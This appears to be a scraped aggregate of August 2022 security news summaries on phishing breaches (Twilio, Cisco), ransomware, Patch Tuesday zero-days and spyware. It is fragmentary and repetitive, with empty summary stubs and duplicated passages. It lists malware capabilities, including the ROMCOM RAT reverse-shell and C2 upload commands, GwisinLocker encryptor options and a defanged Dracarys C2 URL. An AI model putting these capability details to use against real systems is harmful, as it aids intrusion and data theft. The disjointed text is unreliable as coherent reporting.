"Autosummary:
ThreatMapper 1.4 includes: ThreatGraph, a new feature that uses runtime context like network flows to prioritize threat scan results and enables organizations to narrow down attack path alerts from thousands to a handful of the most meaningful (and threatening) Agentless cloud security posture management (CSPM) of cloud assets mapped to various compliance controls like CIS, HIPAA, GDPR, SOC 2, and more YaraHunter, the industry’s first open source malware scanner for cloud native environments “The cloud native ecosystem is built on OSS libraries and components, yet the majority of tools available to secure cloud native workloads are closed source proprietary software that you can never fully understand how they work, and which only companies with deep pockets can afford. "Autosummary:
"Stonefly specializes in mounting highly selective targeted attacks against targets that could yield intelligence to assist strategically important sectors such as energy, aerospace, and military equipment," Symantec, a division of Broadcom Software, said in April. "Cloudflare revealed that at least 76 employees and their family members were targeted by smishing attacks similar to the one that hit Twilio. The content delivery network and DDoS mitigation company Cloudflare revealed this week that at least 76 employees and their family members received text messages on their personal and work phones. According to […]
The post Hackers behind Twilio data breach also targeted Cloudflare employees appeared first on Security Affairs.
"Autosummary:
“They came from four phone numbers associated with T-Mobile-issued SIM cards: (754) 268-9387, (205) 946-7573, (754) 364-6683 and (561) 524-5989. "Autosummary:
Sygnal Partners iWired Applied Automation Tech RMM Central Itarian Auvik RemotePC RentoMojo Parcel International WhatFix EZLynx EATclub Canada Standard Notes Roy/Zeon shows off social engineering skills AdvIntel researchers say that the choice to impersonate the above brands was based on the assessment that targeted employees would be more inclined to talk to vendors of software specific to their activity, which is less known outside the industry. For BazarCall phishing campaigns, Quantum impersonates a much larger number of brands, as observed by AdvIntel researchers: Ginyard International “Azure Dragon” (Azure Storage) Oracle HelloFresh Luchechko Mortgage Team US Equal Opportunity Employment Commission CrowdStrike Gobble Regardless of the theme in the phishing email, the threat actor urged recipients to call a number for further clarifications. The researchers were able to identify eight other victims of Roy/Zeon’s BazarCall campaigns: a full-service landscaping company in Texas a leading Italian producer of pharmaceuticals a manufacturer of machined metal components a specialized service center for Porsche, Bentley, Lamborghini, Audi, and Mercedes a small Italian municipality a Canadian electrical and instrumentation contractor a large Canadian distributor of Mediterranean foods a city magazine focused on the Detroit area "Autosummary:
"After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment," Cisco Talos said. "Autosummary:
ROMCOM RAT supports ten commands as listed below: Return connected drive information Return file listings for a specified directory Start up a reverse shell under the name svchelper.exe within the %ProgramData% folder Upload data to C2 as ZIP file, using IShellDispatch to copy files Download data and write to worker.txt in the %ProgramData% folder Delete a specified file Delete a specified directory Spawn a process with PID "Autosummary:
"Autosummary:
"Autosummary:
Breached three times within two months After the initial compromise, LockBit, Hive, and ALPHV/BlackCat affiliates also gained access to the victim"s network on April 20, May 1, and May 15, respectively. "A coalition of cybersecurity and technology leaders announced an open-source effort to break down data silos that impede security teams. The Open Cybersecurity Schema Framework (OCSF) project, revealed at Black Hat USA 2022, will help organizations detect, investigate and stop cyberattacks faster and more effectively. The OCSF project was conceived and initiated by AWS and Splunk, building upon the ICD Schema work done at Symantec, a division of Broadcom. The OCSF includes contributions from 15 … More
The post Open Cybersecurity Schema Framework project helps organizations detect and defend from cyberattacks appeared first on Help Net Security.
"Autosummary:
The OCSF includes contributions from 15 additional initial members, including Cloudflare, CrowdStrike, DTEX, IBM Security, IronNet, JupiterOne, Okta, Palo Alto Networks, Rapid7, Salesforce, Securonix, Sumo Logic, Tanium, Trend Micro, and Zscaler. “We, as security vendors, need to do right by the security teams who work tirelessly to protect not only their organizations, but the greater community, against a constantly evolving array of threats,” said Sam Adams, Vice President of Detection and Response, Rapid7. “Cybersecurity is one of the most pressing challenges of the 21st century, and no single organization, agency, or vendor can solve it alone,” said Sridhar Muppidi, IBM Fellow, Vice President and Chief Technology Officer, IBM Security. “Security leaders are wrestling with integration gaps across an expanding set of application, service and infrastructure providers, and they need clean, normalized and prioritized data to detect and respond to threats at scale,” said Patrick Coughlin, Group Vice President Security Market, Splunk. "Cisco discloses a security breach, the Yanluowang ransomware group breached its corporate network in late May and stole internal data. Cisco disclosed a security breach, the Yanluowang ransomware group breached its corporate network in late May and stole internal data. The investigation conducted by Cisco Security Incident Response (CSIRT) and Cisco Talos revealed that threat […]
The post Cisco was hacked by the Yanluowang ransomware gang appeared first on Security Affairs.
"Autosummary:
“After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka “vishing”) and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving.” "Autosummary:
Sygnal Partners iWired Applied Automation Tech RMM Central Itarian Auvik RemotePC RentoMojo Parcel International WhatFix EZLynx EATclub Canada Standard Notes Roy/Zeon shows off social engineering skills AdvIntel researchers say that the choice to impersonate the above brands was based on the assessment that targeted employees would be more inclined to talk to vendors of software specific to their activity, which is less known outside the industry. For BazarCall phishing campaigns, Quantum impersonates a much larger number of brands, as observed by AdvIntel researchers: Ginyard International “Azure Dragon” (Azure Storage) Oracle HelloFresh Luchechko Mortgage Team US Equal Opportunity Employment Commission CrowdStrike Gobble Regardless of the theme in the phishing email, the threat actor urged recipients to call a number for further clarifications. The researchers were able to identify eight other victims of Roy/Zeon’s BazarCall campaigns: a full-service landscaping company in Texas a leading Italian producer of pharmaceuticals a manufacturer of machined metal components a specialized service center for Porsche, Bentley, Lamborghini, Audi, and Mercedes a small Italian municipality a Canadian electrical and instrumentation contractor a large Canadian distributor of Mediterranean foods a city magazine focused on the Detroit area "Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: patch Tuesday Tags: MSDT Tags: NFS Tags: PPP Tags: Exchange Tags: CVE-2022-34713 Tags: CVE-2022-35743 Tags: DogWalk Tags: CVE-2022-30134 Tags: CVE-2022-24477 Tags: CVE-2022-24516 Tags: CVE-2022-30133 Tags: CVE-2022-34715 Tags: Adobe Tags: Cisco Tags: Google Tags: Android Tags: SAP Tags: VMWare Patch Tuesday for August 2022 has come around. We take a look at the most important vulnerabilities that Microsoft"s fixed and a brief look at what other vendors did. |
The post Update now! Microsoft fixes two zero-days in August"s Patch Tuesday appeared first on Malwarebytes Labs.
"Autosummary:
Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, and Microsoft Exchange Server 2013 CU 23.Affected products are Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, Microsoft Exchange Server 2013 CU 23, Microsoft Exchange Server 2016 CU 23, and Microsoft Exchange Server 2019 CU 12.Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2013 CU 23, Microsoft Exchange Server 2019 CU 11, and Microsoft Exchange Server 2016 CU 22. "The enterprise-grade Titan M security chip was custom built to help protect data. Derived from the same chip Google uses to protect its cloud data centers, it handles processes and information, such as passcode protection, encryption, and secure transactions in apps. In this Help Net Security video, Damiano Melotti, Security Researcher, Quarkslab, talks about the vulnerability research challenges encountered while exploring Google’s Titan M chip. If you’re attending Black Hat USA 2022, you can learn … More
The post Dissecting Google’s Titan M chip: Vulnerability research challenges appeared first on Help Net Security.
"Autosummary:
"NetRise released the NetRise Platform, which is providing insights into shared vulnerabilities across XIoT firmware images in an organization. NetRise is a cloud-based SaaS platform that analyzes and monitors the firmware of XIoT devices. The firmware images are then dissected, presenting all of the key data, artifacts, and risk in an easy-to-consume interface. As a result, NetRise reduces the time and cost of firmware security programs allowing organizations to find and remediate previously undetected issues. … More
The post NetRise Platform provides continuous monitoring of XIoT firmware vulnerabilities appeared first on Help Net Security.
"Autosummary:
NetRise continuously monitors and analyzes artifacts within firmware to identify and prioritize: NetRise continuously monitors and analyzes artifacts within firmware to identify and prioritize: Vulnerabilities (known and unknown) Compliance adherence Software bill of materials (SBOM) Misconfigurations Overall risk Key features: Vulnerability identification and Monitoring Comprehensive SBOM Risk comparisons of new firmware versions to existing versions Vulnerability and other risk prioritization Correlation across all monitored devices Firmware repository to query when new vulnerabilities are identified “NetRise provides the perfect solution for mapping XIoT devices to traditional security processes,” said Michael Scott, Co-Founder & CTO of NetRise. "Autosummary:
Other backdoors utilized in the attacks include nccTrojan, Cotx, DNSep, Logtu, and a previously undocumented malware dubbed as CotSam, so named owing to its similarities with Cotx. "Resecurity identified threat actors leveraging open redirect vulnerabilities in online services and apps to bypass spam filters to ultimately deliver phishing content. Using highly trusted service domains like Snapchat and other online-services, they create special URLs which lead to malicious resources with phishing kits. The kit identified is named LogoKit, which was previously used in attacks against the customers of Office 365, Bank of America, GoDaddy, Virgin Fly, and many other major financial institutions and … More
The post LogoKit update: The phishing kit leveraging open redirect vulnerabilities appeared first on Help Net Security.
"Autosummary:
"Hive, LockBit and BlackCat, three prominent ransomware gangs, consecutively attacked the same network, according to Sophos. The first two attacks took place within two hours, and the third attack took place two weeks later. Each ransomware gang left its own ransom demand, and some of the files were triple encrypted. “It’s bad enough to get one ransomware note, let alone three,” said John Shier, senior security advisor at Sophos. “Multiple attackers create a whole new … More
The post Three ransomware gangs consecutively attacked the same network appeared first on Help Net Security.
"Autosummary:
Most of the initial infections for the attacks highlighted in the whitepaper occurred through either an unpatched vulnerability, with some of the most notable being Log4Shell, ProxyLogon, and ProxyShell, or poorly configured, unsecured Remote Desktop Protocol (RDP) servers. "Cloud communications company Twilio has announced that some of it employees have been phished and that the attackers used the stolen credentials to gain access to some internal company systems and customer data. What happened? The attackers impersonated Twilio’s IT department and sent text messages to current and former Twilio employees, asking them to click on a link to update their passwords or check how their schedule has changed. “The URLs used words including “Twilio,” … More
The post Twilio confirms data breach after its employees got phished appeared first on Help Net Security.
"Autosummary:
“The URLs used words including “Twilio,” “Okta,” and “SSO” to try and trick users to click on a link taking them to a landing page that impersonated Twilio’s sign-in page,” the company explained. "Autosummary:
"Autosummary:
Andariel has been linked to ransomware attacks in the recent past, targeting South Korean companies in media, construction, manufacturing, and network services. "Autosummary:
The data that Dracarys can collect and transmit to the C2 server include the following: Contact list SMS data Call logs Installed applications list Files GPS position Finally, the spyware can capture screenshots from the device, record audio, and upload the media to the C2, which in the sample analyzed by Cyble was "hxxps://signal-premium-app[.]org". "Autosummary:
" The communications giant has 268,000 active customer accounts, and counts companies like Airbnb, Box, Dell, DoorDash, eBay, Glassdoor, Lyft, Salesforce, Stripe, Twitter, Uber, VMware, Yelp, and Zendesk among its clients. "China-linked threat actors targeted dozens of industrial enterprises and public institutions in Afghanistan and Europe. In January 2022, researchers at Kaspersky ICS CERT uncovered a series of targeted attacks on military industrial enterprises and public institutions in Afghanistan and East Europe. The attackers breached dozens of enterprises and in some cases compromised their IT infrastructure, […]
The post Chinese actors behind attacks on industrial enterprises and public institutions appeared first on Security Affairs.
"Autosummary:
The Portdoor backdoor implements multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration. "Autosummary:
"Autosummary:
"The August 2022 Patch Tuesday has arrived, with fixes for an unexpectedly high number of vulnerabilities in various Microsoft products, including two zero-days: one actively exploited (CVE-2022-34713) and one not yet (CVE-2022-30134). Vulnerabilities to prioritize CVE-2022-34713 is a vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) that allows for remote code execution. For an attacker to exploit it, they must trick targets into opening a specially crafted file (delivered via email or downloaded from a … More
The post Microsoft fixes exploited zero-day in Windows Support Diagnostic Tool (CVE-2022-34713) appeared first on Help Net Security.
"Autosummary:
More importantly, it seems, three other critical elevation of privilege vulnerabilities affecting Exchange – CVE-2022-24477, CVE-2022-24516, CVE-2022-21980 – have been patched by Microsoft. "Cybersecurity researchers from Kaspersky linked the Maui ransomware to the North Korea-backed Andariel APT group. Kaspersky linked with medium confidence the Maui ransomware operation to the North Korea-backed APT group Andariel, which is considered a division of the Lazarus APT Group, North Korean nation-state actors used Maui ransomware to encrypt servers providing healthcare services, including electronic […]
The post Experts linked Maui ransomware to North Korean Andariel APT appeared first on Security Affairs.
"Autosummary:
"Autosummary:
The problem came back to public attention this year by security researcher j00sean, who summarized what an attacker could achieve by exploiting it and provided video proof: Successful exploitation requires user interaction, an obstacle easy to surpass through social engineering, especially in email and web-based attacks, Microsoft says in an advisory today: "Autosummary:
"Categories: Business In this post, a cybersecurity expert gives his 6-point checklist of features your EDR should have to stop ransomware. |
The post Can your EDR handle a ransomware attack? 6-point checklist for an anti-ransomware EDR appeared first on Malwarebytes Labs.
"Autosummary:
Businesses, especially small-to-medium sized ones with limited budget or IT resources, need to make sure that their EDR is cost-effective, easy-to-use, and able to reliably stop the growing ransomware threat.Robert Zamani, Regional Vice President, Americans Solutions Engineering To avoid unnecessary complexity in figuring out the origin of a ransomware threat, your EDR solution should have an industry standardized way of describing the attack—such as MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge). In this post, Robert Zamani, Regional Vice President, Americans Solutions Engineering at Malwarebytes, gives his 6-point checklist of features your EDR should have to stop ransomware. “Your ransomware rollback should store changes to data files on the system in a local cache for 72 hours (no ransomware actually exceeds 24 hours), which can be used to help revert changes caused by ransomware,” Zamani says.Thorough containment, eradication, and recovery options Look to an EDR to mitigate unforeseen threats and ultimately a new method of ransomware (exploitation of trust), says Zamani. "Categories: Privacy Twitter has confirmed a data breach on July 2. |
The post Twitter data breach affects 5.4M users appeared first on Malwarebytes Labs.
"Autosummary:
“We want to let you know about a vulnerability that allowed someone to enter a phone number or email address into the log-in flow in the attempt to learn if that information was tied to an existing Twitter account, and if so, which specific account. "As the provider of real-time cyber security protection for business and consumers, guardDog.ai is using VMware’s Tanzu containerization technology to support hardware-free and entirely remote deployment and management of cyber security protection for any size MSSP or organization. guardDog’s subscription-based Fido technology uses patent-pending artificial intelligence from the company’s cloud-based Autonomous Incident Response (AiR) database to pre-emptively recognize all devices connected to a network (including most especially the IoT and smart device connections device management … More
The post guardDog.ai partners with VMware to protect users and networks from attempted cyberattacks appeared first on Help Net Security.
"Autosummary:
These include the myriad of IoT (Internet of Things) devices such as specialized health monitoring equipment, printers, doorbells, thermostats, smart refrigerators, smart pens, smart TVs, and game systems that are inherently vulnerable to the networks they join. "IDEX Biometrics and Reltime formed a partnership to jointly develop and market Web3 biometric payment card including cold storage and digital asset wallets, combined with digital identification. This all-in-one, EMV compliant biometric payment card is anticipated to reach the market in the first half of 2023. The biometric solution based on IDEX Biometrics sensor technology will enable EMV compliant payments alongside Reltime’s global Web3 financial ecosystem’s unique “check-out” feature. Securing fiat and digital asset transactions … More
The post IDEX Biometrics and Reltime collaborate to launch Web3 biometric payment card appeared first on Help Net Security.
"Autosummary:
"Microsoft Patch Tuesday security updates for August 2022 addressed a zero-day attack remote code execution vulnerability in Windows. Microsoft Patch Tuesday security updates for August 2022 addressed 118 CVEs in multiple products, including .NET Core, Active Directory Domain Services, Azure Batch Node Agent, Azure Real Time Operating System, Azure Site Recovery, Azure Sphere, Microsoft ATA […]
The post Microsoft Patch Tuesday for August 2022 fixed actively exploited zero-day appeared first on Security Affairs.
"Autosummary:
"Categories: News Categories: Threat Intelligence Tags: Healthcare Tags: Medical Read about trends in cyberattacks in the Healthcare and Medical industry, as well as our recommendations for helping to secure your healthcare organization. |
The post Summer of exploitation leads to healthcare under fire appeared first on Malwarebytes Labs.
"Autosummary:
Quickly patching vulnerabilities is a high priority, however given that quick patching isn’t always an option, times like these require risk reduction, such as removing non-patchable endpoints from direct Internet access, creating additional layers of authentication to access high value systems, and a thorough review of user accounts and permissions, to tighten up who has access to what. "Categories: News Categories: Threat Intelligence Tags: Education Beyond spikes in detections, the education sector has dealt with an onslaught of attacks ranging from spyware and denial of service tools to ransomware. |
The post Education hammered by exploits and backdoors in 2021 and 2022 appeared first on Malwarebytes Labs.
"Autosummary:
The first half of 2021 saw attacks against schools in Florida, New York, Oregon, Massachusetts, and California, while the second half saw attacks against Texas, Washington D.C., Wisconsin, and Illinois.In a lot of cases, organizations may have a difficult time updating quickly, because of operational needs, but in the case of schools, a single vulnerability might be duplicated across 99% of its endpoints, which turns each of those systems into backdoors for the bad guys. "Cynerio and the Ponemon Institute have examined the current impact of cyberattacks on healthcare facilities and network-connected IoT and medical devices, and found multiple alarming trends. Among other things, the survey has also revealed that almost half of hospitals have been attacked with ransomware, and that 76% of victimized hospitals were attacked 3 or more times. Key report findings The Insecurity of Connected Devices in HealthCare 2022 Report surveyed 517 experts in leadership positions at … More
The post Cyberattacks on healthcare organizations negatively impact patient care appeared first on Help Net Security.
"Autosummary:
Perceived risk in IoT/ IoMT devices is high, but proactive security actions and accountability are not 71% of respondents rated the security risks presented by IoT/IoMT devices as high or very high, while only 21% report a mature stage of proactive security actions. "Fears over security have become less of a concern for organizations adopting IoT solutions than it was five years ago, according to a recent study by Wi-SUN Alliance, a global member-based association of industry leading companies driving the adoption of interoperable wireless solutions for use in smart cities, smart utilities, IoT and industrial IoT (IIoT) applications. The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based … More
The post Data privacy regulation a top three challenge for IoT adopters appeared first on Help Net Security.
"Autosummary:
The Journey to IoT Maturity, a follow-up to Wi-SUN’s ‘state of the nation’ IoT study in 2017, is based on interviews with IT decision makers from UK and US IoT adopters within key industries, including energy and utilities, state and local government, construction, technology, and telecommunications. "In this Help Net Security video, Charl van der Walt, Head of Security Research, Orange Cyberdefense, discusses whether criminalizing ransomware payments could quell the current crime wave by cutting off the flow of funds that motivates cybercriminals.
The post Could criminalizing ransomware payments put a stop to the current crime wave? appeared first on Help Net Security.
"Autosummary:
"Threat actors abuse open redirects on Snapchat and American Express to launch phishing attacks against Microsoft 365 users. Attackers abused open redirects on the websites of Snapchat and American Express as part of a phishing campaign targeting Microsoft 365 users. The term Open URL redirection, open redirects, refers to a security issue that makes it […]
The post Attackers abuse open redirects in Snapchat and Amex in phishing attacks appeared first on Security Affairs.
"Autosummary:
“When examining links, surfers should keep an eye out for URLs that include, for example, “url=”, “redirect=”, “external-link”, or “proxy”. "As regulators hand out hundreds of millions of dollars in fines for record-keeping failures related to the use of social messaging platforms such as WhatsApp, the finance industry faces a choice: properly enforce bans on the use of these apps or find ways to make them compliant.
“The explosion of new electronic communications channels — and the pervasive use of these — raises lots of red flags for the regulators,” said Anthony Diana, a partner at law firm Reed Smith’s Tech & Data Group. “The fear is that, if bad things are happening, they"re happening on these personal apps, not on the sanctioned communication channels that are surveilled.”
Anthony Diana
Anthony Diana, a partner at law firm Reed Smith’s Tech & Data Group.
Autosummary:
“We have a module in our surveillance platform that looks specifically for words like, "Let"s move this WhatsApp, or to Telegram,’ ‘Ping me on Signal,’ or whatever it might be,” said Brian Lynch, president of US operations at SteelEye, a compliance monitoring and reporting software vendor. “A firm can choose which way it wants to go, but it can"t just be, ‘We"re going to ban it,’ versus ‘We"re going to allow it,” said John Lukanski, a partner in Reed Smith’s Financial Industry Group. "Addressing regulatory requirements around capturing, archiving, and monitoring the use of mobile communications is a difficult problem,” said Raúl Castañón, senior analyst at 451 Research, a division of S&P Global Market Intelligence.By capturing WhatsApp conversations, the data can be made available for e-discovery and monitoring, just like any other channel, said Shiran Weitzman, CEO of Shield, a communication compliance software vendor. Some of the main vendors offering WhatsApp capture include Guardec, LeapXpert, Movius, Symphony, TeleMessage, and Voxsmart. Movius, which also sells software to monitor and record voice calls, SMS, and WhatsApp messages on mobile devices, counts JPMorgan Chase and UBS among its customers. "Autosummary:
To do that, they impersonated Twilio"s IT department, asking them to click URLs containing "Twilio," "Okta," and "SSO" keywords that would redirect them to a Twilio sign-in page clone. "Autosummary:
"Autosummary:
"The attack targeted industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan," Kaspersky ICS CERT researchers said. "Autosummary:
There are believed to be over 90 active groups using Classiscam"s services to target users in Bulgaria, the Czech Republic, France, Kazakhstan, Kirghizia, Poland, Romania, Ukraine, the U.S. and Uzbekistan.Other sites in the network pose as Singaporean moving companies, European, Asian, and Middle Eastern classified websites, banks, marketplaces, food and crypto brands, and delivery companies. "LogoKit – Threat actors leveraging Open Redirect Vulnerabilities popular in online services and apps to bypass spam filters in phishing campaigns. Resecurity, Inc. (USA), a Los Angeles-based cybersecurity company providing managed threat detection and response for Fortune 500’s, identified threat actors leveraging Open Redirect Vulnerabilities popular in online services and apps to bypass spam filters […]
The post LogoKit update – The phishing kit leveraging Open Redirect Vulnerabilities appeared first on Security Affairs.
"Autosummary:
Notably, the actors prefer to use domain names in exotic jurisdictions or zones with relatively poor abuse management process – .gq, .ml, .tk, ga, .cf or to gain unauthorized access to legitimate WEB-resources, and then use them as hosting for further phishing distribution. "Communications company Twilio discloses a data breach after threat actors have stolen employee credentials in an SMS phishing attack. Communications company Twilio discloses a data breach, threat actors had access to the data of some of its customers. The attackers accessed company systems using employee credentials obtained through a sophisticated SMS phishing attack. Twilio is […]
The post Twilio discloses data breach that impacted customers and employees appeared first on Security Affairs.
"Autosummary:
The URLs in the messages included words like “Twilio,” “Okta,” and “SSO” in the attempt to trick users into clicking on a link redirecting them to a landing page that impersonated Twilio’s sign-in page. "Autosummary:
In a thread on Twitter, Smirnov explains that the LNK file executes the Command Prompt with the following command that retrieves a payload from a remote location: Command for fetching malicious script source: Alex Smirnov The script was created to show a Notepad with the “pdf password: salary2022” and to check if the compromised system is protected by a security solution from ESET, Tencent, or Bitdefender. "Autosummary:
"Since mid-July, RapperBot has switched from self-propagation to maintaining remote access into the brute-forced SSH servers," the researchers said. "We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out.
The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.
"Autosummary:
If you receive an unexpected call about energy prices or rebates, Insist on calling “them” back on their official number, taken from an official website, directly.Posted: August 7, 2022 by We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out. "Researchers spotted a new family of ransomware, named GwisinLocker, that encrypts Windows and Linux ESXi servers. Researchers warn of a new ransomware called GwisinLocker which is able to encrypt Windows and Linux ESXi servers. The ransomware targets South Korean healthcare, industrial, and pharmaceutical companies, its name comes from the name of the author ‘Gwisin’ (ghost […]
The post GwisinLocker ransomware exclusively targets South Korea appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "A massive cyberattack hit the website of the German Chambers of Industry and Commerce (DIHK) this week. A massive attack hit the website of the German Chambers of Industry and Commerce (DIHK) forcing the organization to shut down its IT systems as a precautionary measure for security reasons. “Due to a possible cyber attack, the […]
The post Serious cyberattack hits German Chambers of Industry and Commerce (DIHK) appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Categories: News Categories: Scams Tags: scam Tags: phish Tags: email Tags: social engineering Tags: gas Tags: electricity Tags: energy company Tags: rebate Tags: discount Tags: switch We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out. |
The post Phishy calls and emails play on energy cost increase fears appeared first on Malwarebytes Labs.
"Autosummary:
If you receive an unexpected call about energy prices or rebates, Insist on calling "them" back on their official number, taken from an official website, directly.Posted: August 6, 2022 by We take a look at a wave of scams involving people"s fears of increasing energy prices, and how to avoid being caught out. "Autosummary:
"Autosummary:
"Autosummary:
The command-line arguments for the GwisinLocker Linxu encryptor are listed below: Usage: Usage -h, --help show this help message and exit Options -p, --vp= Comma-separated list of paths to encrypt -m, --vm= Kills VM processes if 1; Stops services and processes if 2 -s, --vs= Seconds to sleep before execution -z, --sf= Skip encrypting ESXi-related files (those excluded in the configuration) "Greek intelligence admitted it had spied on a journalist, while citizens ask the government to reveal the use of surveillance malware. The head of the Greek intelligence told a parliamentary committee that they had spied on a journalist with surveillance malware, Reuters reported citing two sources present. The revelation comes while media and journalists are […]
The post Greek intelligence service used surveillance malware to spy on a journalist, Reuters reports appeared first on Security Affairs.
"Autosummary:
"In this Help Net Security video, Ofri Ouzan, Security Researcher at Rezilion, talks about MI-X (Am I Exploitable?), an open source tool aimed at effectively determining whether a local host or a running container image is truly vulnerable to a specific vulnerability by accounting for all factors which affect actual exploitability. The tool prints the logical steps it takes in order to reach a decision and can generate a flow chart depicting the complete logical … More
The post MI-X: Open source project helps you understand whether you are exploitable appeared first on Help Net Security.
"Autosummary:
"VIPRE Security Group announced it is preparing to add a new cybersecurity tool to its comprehensive suite of offerings. The new solution, VIPRE Endpoint Detection and Response (EDR), was designed to help small and medium-sized businesses (SMBs) and IT partners navigate the complexities of EDR management from a single, easy-to-use console. While VIPRE EDR will be available publicly this fall, the company is ready to launch its Beta program and seeks users to test the … More
The post VIPRE Endpoint Detection and Response protects SMBs against malware and other malicious attacks appeared first on Help Net Security.
"Autosummary:
Understand how and when a potential threat impacted your systems, including all aspects of endpoint activity related to the threat – all user, process, file, registry, and network activity. "Autosummary:
"Autosummary:
"Autosummary:
"Bitter injected Dracarys into trojanized (non-official) versions of YouTube, Signal, Telegram, WhatsApp, and custom chat applications capable of accessing call logs, contacts, files, text messages, geolocation, device information, taking photos, enabling microphone, and installing apps," explained Meta"s report. "Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month.
The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.
"Autosummary:
How to protect yourself from #scam robotexts: ▪️ Do not respond ▪️ Do not click on any links ▪️ Do not provide any info ▪️ File an FCC complaint ▪️ Forward unwanted texts to SPAM (7726) ▪️ Delete all suspicious texts — The FCC (@FCC) July 28, 2022 When you receive a spam text, do not engage with the sender. "Autosummary:
"US Critical Infrastructure Security Agency (CISA) adds a recently disclosed flaw in the Zimbra email suite to its Known Exploited Vulnerabilities Catalog. The Cybersecurity & Infrastructure Security Agency (CISA) has added a recently disclosed flaw in the Zimbra email suite, tracked as CVE-2022-27924, to its Known Exploited Vulnerabilities Catalog. In middle June, researchers from Sonarsource discovered […]
The post CISA adds Zimbra email bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Twitter confirms zero-day used to collect data Today, Twitter has confirmed that the vulnerability used by the threat actor in December is the same one reported to and fixed by them in January 2022 as part of their HackerOne bug bounty program., "In January 2022, we received a report through our bug bounty program of a vulnerability that allowed someone to identify the email or phone number associated with an account or, if they knew a person"s email or phone number, they could identify their Twitter account, if one existed," Twitter disclosed in a security advisory today. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @malwrhunterteam, @DanielGallagher, @FourOctets, @struppigel, @VK_Intel, @Ionut_Ilascu, @demonslay335, @BleepinComputer, @Seifreed, @PolarToffee, @malwareforme, @jorntvdw, @fwosar, @LawrenceAbrams, @serghei, @secuninja, @pcrisk, @siri_urz, @Dschwarcz, @Balgan, and @Mandiant. "ActZero has launched the Ransomware Task Force’s (RTF) “Blueprint for Ransomware Defense”. Aimed at small- and medium-sized enterprises (SMEs) that have limited cybersecurity expertise, the Blueprint provides a set of achievable ransomware safeguards to harden their IT environments. ActZero contributed to the development of the Blueprint, and is actively engaging with its clients, partners, and prospects to encourage adoption. The RTF’s 2021 report called for the cybersecurity community to “develop a clear, actionable framework for … More
The post ActZero releases Blueprint for Ransomware Defense to improve cybersecurity posture for enterprises appeared first on Help Net Security.
"Autosummary:
The RTF’s 2021 report called for the cybersecurity community to “develop a clear, actionable framework for ransomware mitigation, response, and recovery”. "Twitter confirmed that the recent data breach that exposed data of 5.4 million accounts was caused by the exploitation of a zero-day flaw. At the end of July, a threat actor leaked data of 5.4 million Twitter accounts that were obtained by exploiting a now-fixed vulnerability in the popular social media platform. The threat actor offered […]
The post Twitter confirms zero-day used to access data of 5.4 million accounts appeared first on Security Affairs.
"Autosummary:
“In January 2022, we received a report through our bug bounty program of a vulnerability that allowed someone to identify the email or phone number associated with an account or, if they knew a person’s email or phone number, they could identify their Twitter account, if one existed,” continues the social media firm. "The onslaught of ransomware attacks has catapulted cybersecurity to the forefront of global business operations. However, just 36% of mid-sized organizations still don’t have a formal incident response plan in place, according to research from Egnyte. In this Help Net Security video, Neil Jones, Director of Cybersecurity Evangelism at Egnyte, discusses how organizations can stay one step ahead of cybersecurity challenges.
The post How can organizations stay ahead of cybersecurity challenges? appeared first on Help Net Security.
"Autosummary:
"Ransomware attacks show no sign of slowing. According to new research published by Menlo Security, a third of organizations experience a ransomware attack at least once a week, with one in 10 experiencing them more than once a day. The research, conducted among 500+ IT security decision makers at US and UK organizations with more than 1,000 employees, highlights the impact this is having on security professionals’ own wellbeing. When asked what keeps them awake … More
The post A third of organizations experience a ransomware attack once a week appeared first on Help Net Security.
"Autosummary:
According to the report, around half of organizations (61% US and 44% UK) have been the victim of a successful ransomware attack in the last 18 months, with customers and prospects the most likely entry point for an attack. "Qualys announced it is adding External Attack Surface Management (EASM) capabilities to the Qualys Cloud Platform. Integrated into CyberSecurity Asset Management 2.0, the new component adds the external attacker view to identify previously unknown internet-facing assets for a complete and accurate picture of the enterprise attack surface. Digital transformation, increased adoption of cloud and Internet of Things (IoT), a growing remote workforce, and a technology talent shortage have led to an exponential rise in organizations’ … More
The post Qualys CyberSecurity Asset Management 2.0 with EASM identifies unknown internet-facing assets appeared first on Help Net Security.
"Autosummary:
